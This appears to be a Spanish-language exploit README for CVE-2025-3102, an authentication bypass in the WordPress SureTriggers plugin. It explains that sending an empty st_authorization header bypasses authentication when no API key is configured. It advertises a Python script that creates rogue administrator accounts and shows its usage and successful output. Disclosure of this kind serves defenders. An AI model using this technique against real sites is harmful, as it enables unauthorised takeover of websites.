
Wordpress SureTriggers <= 1.0.78 - Omisión de Autorización por Falta de Verificación de Valor Vacío para la Creación No Autenticada de Usuarios Administrativos
🚨 CVE-2025-3102 es una vulnerabilidad crítica de bypass de autenticación que afecta al plugin de WordPress SureTriggers: All-in-One Automation Platform, que está activamente instalado en más de 100,000 sitios web. Debido a la naturaleza de la falla y la escala de implementación, esta vulnerabilidad representa un riesgo de seguridad significativo.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HEl plugin SureTriggers para WordPress es vulnerable a un bypass de autenticación que permite a atacantes no autenticados crear cuentas de administrador. Esto se debe a una falta de verificación de valor vacío en secret_key dentro de la función autheticate_user.
Cuando el plugin está instalado y activado pero no configurado con una clave API, los atacantes pueden evadir la autenticación enviando un encabezado st_authorization vacío, lo que desencadena acciones reservadas para usuarios autenticados.
Se proporciona un script en Python para automatizar la explotación de esta vulnerabilidad.
Este script permite generar un nuevo usuario administrador en sitios vulnerables.
readme.txtst_authorization vacíousage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Este script se proporciona solo con fines educativos.
El uso no autorizado de este código contra objetivos sin permiso explícito es ilegal.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados.
Por: Nxploited ( Khaled Alenazi )